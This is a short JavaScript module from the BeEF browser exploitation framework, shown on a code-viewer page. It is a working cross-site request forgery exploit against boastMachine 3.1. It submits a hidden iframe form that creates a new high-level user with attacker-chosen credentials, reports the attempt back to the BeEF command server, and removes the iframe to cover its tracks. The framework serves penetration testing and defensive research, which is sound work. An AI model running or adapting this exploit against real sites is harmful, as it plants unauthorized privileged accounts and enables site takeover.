CoCalc -- command.js

GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/boastmachine_3_1_add_user_csrf/command.js
¹¹⁵⁴ views

1
//
2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8
	var base     = '<%= @base %>'; 
9
	var username = '<%= @username %>';
10
	var password = '<%= @password %>';
11
	var email    = '<%= @email %>';
12

13
	var boastmachine_iframe = beef.dom.createIframeXsrfForm(base, "POST", "application/x-www-form-urlencoded", [
14
		{'type':'hidden', 'name':'action',     'value':'add_user'},
15
		{'type':'hidden', 'name':'do',         'value':'add'},
16
		{'type':'hidden', 'name':'user_login', 'value':username},
17
		{'type':'hidden', 'name':'user_pass',  'value':password},
18
		{'type':'hidden', 'name':'user_name',  'value':username},
19
		{'type':'hidden', 'name':'user_email', 'value':email},
20
		{'type':'hidden', 'name':'blogs[]',    'value':'4'},
21
		{'type':'hidden', 'name':'user_level', 'value':'4'},
22
	]);
23

24
	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
25

26
	cleanup = function() {
27
		document.body.removeChild(boastmachine_iframe);
28
	}
29
	setTimeout("cleanup()", 15000);
30

31
});
32

33

34

Product

Resources

Company